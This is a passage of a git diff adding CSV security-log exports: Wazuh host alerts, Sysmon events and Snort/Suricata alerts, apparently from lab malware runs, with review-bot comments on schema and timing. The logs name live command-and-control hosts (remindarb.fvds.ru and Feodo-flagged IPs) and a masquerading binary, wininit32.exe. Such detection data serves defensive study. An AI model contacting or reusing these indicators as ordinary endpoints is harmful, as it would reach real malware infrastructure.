service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.066966500Z"",""eventRecordID"":""564"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.061\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\AarSvc_3eb7b\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k AarSvcGroup -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.061"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\AarSvc_3eb7b\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k AarSvcGroup -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.061 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\AarSvc_3eb7b\ImagePath +Details: C:\Windows\system32\svchost.exe -k AarSvcGroup -p""" +"Apr 24, 2020 @ 12:49:51.682",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.066422000Z"",""eventRecordID"":""563"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.061\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\AarSvc_3eb7b\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.061"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\AarSvc_3eb7b\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.061 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\AarSvc_3eb7b\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:49:51.491",5,"SessionEnv was unavailable to handle a notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event.""" +"Apr 24, 2020 @ 12:49:50.437",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. 
+ +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: No + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x36A3A + Linked Logon ID: 0x36A0B + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x3dc + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. 
+ - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 12:49:50.390",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x36A0B + Linked Logon ID: 0x36A3A + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x3dc + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. 
Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 12:49:49.336",7,"SessionEnv was unavailable to handle a critical notification event",,"""The winlogon notification subscriber was unavailable to handle a critical notification event.""" +"Apr 24, 2020 @ 12:49:47.888",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. 
+ +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 12:49:45.827",3,"Ossec agent started.","ossec: Agent started: 'windows-10->any'.", +"Apr 24, 2020 @ 12:49:09.981",5,"SessionEnv was unavailable to handle a notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event.""" +"Apr 24, 2020 @ 12:49:09.968",5,"WSearch was unavailable to handle a notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event.""" +"Apr 24, 2020 @ 12:48:00.246",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. 
+Old md5sum was: 'bbd3c2d027909fd8ca60e5fb29be1c11' +New md5sum is : 'fc7a35e4b9cb3f1aa594dae63bcb0752' +Old sha1sum was: '840961701b92e0a0bb75a3c992b2e764bb835d51' +New sha1sum is : '4428ae482d529a552955f4521ecc3337d5001df3' +", +"Apr 24, 2020 @ 12:48:00.199",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '4256845286e0a414097e9c63c150cb5d' +New md5sum is : '3bed6b4b8101da842bb6afe04a8271c2' +Old sha1sum was: '684a425e096a2850d4c8dc9679a024c65fd89a91' +New sha1sum is : '6bcfa900864cb27898f9c3bf26b53fb3b0eb9d2c' +", +"Apr 24, 2020 @ 12:47:01.564",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'ae09c56e1fd86a6650742bdb6dcf5dae' +New md5sum is : '9c6c66c01d494672cf9c5daac269b542' +Old sha1sum was: 'b04ea1a9371494b1768f710b30ca41fb2a9a2004' +New sha1sum is : 'c813b7e7b36cfefc54b34a27f0216ea1dbc5e53c' +", +"Apr 24, 2020 @ 12:47:01.533",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: '8776cf6928f2de374d1a329d7b0948c3' +New md5sum is : '25da9275704be5bcd294856c17c985ff' +Old sha1sum was: '520ae6cd4e088c14c27c500ba09b18024715ec29' +New sha1sum is : 'b9157e374dc4edd20b987372a7142da352d2a9e4' +", +"Apr 24, 2020 @ 12:47:00.096",5,"Windows System error event",,"""The time service has detected that the system time needs to be changed by 1470613 seconds. The time service will not change the system time by more than 54000 seconds. Verify that your time and time zone are correct, and that the time source time.windows.com,0x9 (ntp.m|0x9|0.0.0.0:123->51.105.208.173:123) is working properly.""" +"Apr 24, 2020 @ 12:46:23.415",3,"Windows Logon Success",,"""An account was successfully logged on. 
+ +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. 
+ - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 12:46:18.619",3,"Service startup type was changed",,"""The start type of the Background Intelligent Transfer Service service was changed from demand start to auto start.""" +"Apr 24, 2020 @ 12:46:09.877",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-08T12:10:56Z. Reason: RulesEngine.""" +"Apr 24, 2020 @ 12:45:37.297",3,"Service startup type was changed",,"""The start type of the Background Intelligent Transfer Service service was changed from auto start to demand start.""" +"Apr 24, 2020 @ 12:44:37.857",8,"Windows Audit Policy changed",,"""System audit policy was changed. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Audit Policy Change: + Category: Object Access + Subcategory: Handle Manipulation + Subcategory GUID: {0cce9223-69ae-11d9-bed3-505054503030} + Changes: Success Added""" +"Apr 24, 2020 @ 12:44:37.841",8,"Windows Audit Policy changed",,"""System audit policy was changed. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Audit Policy Change: + Category: Object Access + Subcategory: File System + Subcategory GUID: {0cce921d-69ae-11d9-bed3-505054503030} + Changes: Success Added""" +"Apr 24, 2020 @ 12:44:31.701",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}' checksum changed. 
+Old md5sum was: '1af7f0914012f801bdabc07119bd84db'
+New md5sum is : '271f59daf9ca28fbeb0bd234897e1662'
+Old sha1sum was: '98d0a499a8ec59bdfd79d0750a971a939fa5e3a2'
+New sha1sum is : 'e8d6ecabf76ed97cd87dc8593f64cd69ec8ec7a2'
+",
+"Apr 24, 2020 @ 12:44:30.591",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed.
+Old md5sum was: '808c317f44b41ac662c03e64ae191df7'
+New md5sum is : '47f9a8fc035cc80b23dfd8be4d23cda6'
+Old sha1sum was: 'cc7c06123ee56b0fe3d451e87d288d35e76cb4de'
+New sha1sum is : '592c18db00c7cbd34e9537e069e1bf1ae084bc9d'
+",
+"Apr 24, 2020 @ 12:44:30.575",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed.
+Old md5sum was: 'c6e83335e428d012cffb29f1570868b1'
+New md5sum is : '480a7b1436febced63b663e198db057e'
+Old sha1sum was: 'e1de9238546bfb9f39c43db2beee554f6c05d8a8'
+New sha1sum is : 'a366c53c7d877bd13ac0386830dbad1b52127af9'
+",
diff --git a/data/MW_3_HIDS_3.csv b/data/MW_3_HIDS_3.csv
new file mode 100644
index 0000000..2f17260
--- /dev/null
+++ b/data/MW_3_HIDS_3.csv
@@ -0,0 +1,21 @@
+timestamp,"rule.level","rule.description","data.win.system.message","full_log","data.win.eventdata.commandLine"
+"May 22, 2020 @ 16:34:41.021",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed.
+Old md5sum was: '496e80acc19637c8daf8c286b6ea10f0'
+New md5sum is : 'a18eb7d2d71c498e6c68f4d4ae0641c7'
+Old sha1sum was: '88ef9e17f6f18f6242bf8a46b383b017d42012b9'
+New sha1sum is : '4458c74e5e5b43abcaa686c52ebb00d5149c3406'
+",
+"May 22, 2020 @ 16:34:41.006",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed.
+Old md5sum was: '89598d32459256342f73e9b832b618dc'
+New md5sum is : '2dff0dec78c8ef123f08b1e2d23e5734'
+Old sha1sum was: '68aacf23a86d664018607a7fc5d1379269af8643'
+New sha1sum is : 'd900f31683f204db3e8408c6a0391eed28337ae9'
+",
+"May 22, 2020 @ 16:33:13.411",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",,,
+"May 22, 2020 @ 16:33:04.030",7,"SessionEnv was unavailable to handle a critical notification event","""The winlogon notification subscriber was unavailable to handle a critical notification event.""",,
+"May 22, 2020 @ 16:28:47.269",7,"Integrity checksum changed.",,"File 'HKEY_LOCAL_MACHINE\Security\Policy\PolAdtEv' checksum changed.
+Old md5sum was: '9d15aff4d26f802c3c4d3d74a00d8d4d'
+New md5sum is : 'b40de87500ee3eed90c2ce3ce8c7946f'
+Old sha1sum was: '11f3afa3902d0fadfcc52e4c051995f536c7d4e2'
+New sha1sum is : '2f6e6dd0efd148b1c11d33c91e9cea4a97a84792'
+",
diff --git a/data/MW_3_NIDS.csv b/data/MW_3_NIDS.csv
new file mode 100644
index 0000000..ae0b178
--- /dev/null
+++ b/data/MW_3_NIDS.csv
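Review bot: The column set of this export does not match the other HIDS exports in the same commit — this header has six columns ending in `full_log` and `data.win.eventdata.commandLine`, while the `MW_4_HIDS_3.csv` header that follows has eight, adding `data.win.eventdata.targetObject` and `data.win.eventdata.details` and placing `full_log` in a different position — so the per-sample files cannot be concatenated or loaded under one schema without silent column misalignment. Exporting every file with the same fixed column list, or documenting each file's schema in a README under `data/`, would make the per-sample comparison reproducible. The `data.win.eventdata.commandLine` column is empty in every row here, which looks like a field selected in the viewer but never populated for this sample; stating that explicitly would stop readers from treating the blanks as a parsing error.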
@@ -0,0 +1,7 @@ +"@timestamp",message,"log.file.path" +"Apr 4, 2020 @ 15:17:53.844","04/04-15:17:47.716250 [**] [1:2404312:5676] ET CNC Feodo Tracker Reported CnC Server TCP group 7 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50356 -> 181.135.153.203:443","/var/log/snort/alert.fast" +"Apr 4, 2020 @ 15:17:53.814","04/04/2020-15:17:47.716250 [**] [1:2404306:5677] ET CNC Feodo Tracker Reported CnC Server group 7 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50356 -> 181.135.153.203:443","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 15:17:28.805","04/04-15:17:22.852731 [**] [1:2404320:5676] ET CNC Feodo Tracker Reported CnC Server TCP group 11 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50341 -> 189.173.113.67:443","/var/log/snort/alert.fast" +"Apr 4, 2020 @ 15:17:28.805","04/04/2020-15:17:22.852731 [**] [1:2404310:5677] ET CNC Feodo Tracker Reported CnC Server group 11 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50341 -> 189.173.113.67:443","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 15:15:53.792","04/04/2020-15:15:52.336603 [**] [1:2404324:5677] ET CNC Feodo Tracker Reported CnC Server group 25 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50278 -> 96.20.84.254:7080","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 15:15:53.792","04/04-15:15:52.336603 [**] [1:2404348:5676] ET CNC Feodo Tracker Reported CnC Server TCP group 25 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50278 -> 96.20.84.254:7080","/var/log/snort/alert.fast" diff --git a/data/MW_4_HIDS_3.csv b/data/MW_4_HIDS_3.csv new file mode 100644 index 0000000..9e88729 --- /dev/null +++ b/data/MW_4_HIDS_3.csv 
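Review bot: The alerts here are dated Apr 4, 2020, while every row in data/MW_3_HIDS_3.csv is from May 22, 2020, so the NIDS and HIDS evidence for this sample appear to come from separate runs roughly seven weeks apart. If that is intended (the `_HIDS_3` suffix suggests a later host-side replay), a README or data-dictionary line stating that the per-sample files are not time-aligned would keep consumers from trying to join them on timestamp. Each flow also appears twice, once from Snort (`/var/log/snort/alert.fast`) and once from Suricata (`/var/log/suricata/fast.log`) with the same 5-tuple and signature family, which is worth stating so row counts are not read as distinct detections.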
@@ -0,0 +1,134 @@ +timestamp,"rule.level","rule.description","data.win.system.message","data.win.eventdata.commandLine","data.win.eventdata.targetObject","full_log","data.win.eventdata.details" +"May 26, 2020 @ 16:22:13.549",14,"ATT&CK: Suspicious Program Location with Network Connections","""Network connection detected: +RuleName: Usermode +UtcTime: 2020-05-26 16:22:08.212 +ProcessGuid: {df9fc3d3-41ca-5ecd-0000-001001f90300} +ProcessId: 3772 +Image: C:\Users\Public\Documents\wininit32.exe +User: DESKTOP-HUE026H\John Williams +Protocol: tcp +Initiated: true +SourceIsIpv6: false +SourceIp: 172.16.2.2 +SourceHostname: DESKTOP-HUE026H.localdomain +SourcePort: 49733 +SourcePortName: +DestinationIsIpv6: false +DestinationIp: 91.240.87.131 +DestinationHostname: remindarb.fvds.ru +DestinationPort: 80 +DestinationPortName: http""",,,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""3"",""version"":""5"",""level"":""4"",""task"":""3"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-26T16:22:09.493057500Z"",""eventRecordID"":""1641"",""processID"":""2080"",""threadID"":""1180"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Network connection detected:\r\nRuleName: Usermode\r\nUtcTime: 2020-05-26 16:22:08.212\r\nProcessGuid: {df9fc3d3-41ca-5ecd-0000-001001f90300}\r\nProcessId: 3772\r\nImage: C:\\Users\\Public\\Documents\\wininit32.exe\r\nUser: DESKTOP-HUE026H\\John Williams\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 172.16.2.2\r\nSourceHostname: DESKTOP-HUE026H.localdomain\r\nSourcePort: 49733\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 91.240.87.131\r\nDestinationHostname: remindarb.fvds.ru\r\nDestinationPort: 80\r\nDestinationPortName: http\""""},""eventdata"":{""ruleName"":""Usermode"",""utcTime"":""2020-05-26 
16:22:08.212"",""processGuid"":""{df9fc3d3-41ca-5ecd-0000-001001f90300}"",""processId"":""3772"",""image"":""C:\\\\Users\\\\Public\\\\Documents\\\\wininit32.exe"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""protocol"":""tcp"",""initiated"":""true"",""sourceIsIpv6"":""false"",""sourceIp"":""172.16.2.2"",""sourceHostname"":""DESKTOP-HUE026H.localdomain"",""sourcePort"":""49733"",""destinationIsIpv6"":""false"",""destinationIp"":""91.240.87.131"",""destinationHostname"":""remindarb.fvds.ru"",""destinationPort"":""80"",""destinationPortName"":""http""}}}", +"May 26, 2020 @ 16:22:03.549",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '3e52d3c90dc2ce2a10b60303bfa665d8' +New md5sum is : '822a2f102de1e8d2a0e370ffe3de779d' +Old sha1sum was: '6e5b745544851872c6f1e39e9d91a6195e1ecf30' +New sha1sum is : '35f1effa6a998ff6100516208e2c27c97e4ae9f8' +", +"May 26, 2020 @ 16:22:03.533",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. 
+Old md5sum was: '724cdf662876b7f16830bfbeb2ac9b3a' +New md5sum is : '9a9fee6d5a36d0bdb2b1909600157f05' +Old sha1sum was: 'eb3a1f0df599d4e06740b3159f04bf6b12fbffc7' +New sha1sum is : 'b32d7a1dfdd857d79c6f2b5d7103a6b11e3e46b5' +", +"May 26, 2020 @ 16:21:51.970",14,"ATT&CK: Suspicious Program Location with Network Connections","""Network connection detected: +RuleName: Usermode +UtcTime: 2020-05-26 16:21:47.389 +ProcessGuid: {df9fc3d3-41ca-5ecd-0000-001001f90300} +ProcessId: 3772 +Image: C:\Users\Public\Documents\wininit32.exe +User: DESKTOP-HUE026H\John Williams +Protocol: tcp +Initiated: true +SourceIsIpv6: false +SourceIp: 172.16.2.2 +SourceHostname: DESKTOP-HUE026H.localdomain +SourcePort: 49728 +SourcePortName: +DestinationIsIpv6: false +DestinationIp: 91.240.87.131 +DestinationHostname: remindarb.fvds.ru +DestinationPort: 80 +DestinationPortName: http""",,,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""3"",""version"":""5"",""level"":""4"",""task"":""3"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-26T16:21:48.506365300Z"",""eventRecordID"":""1632"",""processID"":""2080"",""threadID"":""1180"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Network connection detected:\r\nRuleName: Usermode\r\nUtcTime: 2020-05-26 16:21:47.389\r\nProcessGuid: {df9fc3d3-41ca-5ecd-0000-001001f90300}\r\nProcessId: 3772\r\nImage: C:\\Users\\Public\\Documents\\wininit32.exe\r\nUser: DESKTOP-HUE026H\\John Williams\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 172.16.2.2\r\nSourceHostname: DESKTOP-HUE026H.localdomain\r\nSourcePort: 49728\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 91.240.87.131\r\nDestinationHostname: remindarb.fvds.ru\r\nDestinationPort: 80\r\nDestinationPortName: 
http\""""},""eventdata"":{""ruleName"":""Usermode"",""utcTime"":""2020-05-26 16:21:47.389"",""processGuid"":""{df9fc3d3-41ca-5ecd-0000-001001f90300}"",""processId"":""3772"",""image"":""C:\\\\Users\\\\Public\\\\Documents\\\\wininit32.exe"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""protocol"":""tcp"",""initiated"":""true"",""sourceIsIpv6"":""false"",""sourceIp"":""172.16.2.2"",""sourceHostname"":""DESKTOP-HUE026H.localdomain"",""sourcePort"":""49728"",""destinationIsIpv6"":""false"",""destinationIp"":""91.240.87.131"",""destinationHostname"":""remindarb.fvds.ru"",""destinationPort"":""80"",""destinationPortName"":""http""}}}", +"May 26, 2020 @ 16:21:43.752",14,"ATT&CK: Suspicious Program Location with Network Connections","""Network connection detected: +RuleName: Usermode +UtcTime: 2020-05-26 16:21:40.112 +ProcessGuid: {df9fc3d3-41ca-5ecd-0000-001001f90300} +ProcessId: 3772 +Image: C:\Users\Public\Documents\wininit32.exe +User: DESKTOP-HUE026H\John Williams +Protocol: tcp +Initiated: true +SourceIsIpv6: false +SourceIp: 172.16.2.2 +SourceHostname: DESKTOP-HUE026H.localdomain +SourcePort: 49718 +SourcePortName: +DestinationIsIpv6: false +DestinationIp: 216.239.36.21 +DestinationHostname: +DestinationPort: 80 +DestinationPortName: http""",,,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""3"",""version"":""5"",""level"":""4"",""task"":""3"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-26T16:21:41.224969400Z"",""eventRecordID"":""1627"",""processID"":""2080"",""threadID"":""1180"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Network connection detected:\r\nRuleName: Usermode\r\nUtcTime: 2020-05-26 16:21:40.112\r\nProcessGuid: {df9fc3d3-41ca-5ecd-0000-001001f90300}\r\nProcessId: 3772\r\nImage: C:\\Users\\Public\\Documents\\wininit32.exe\r\nUser: 
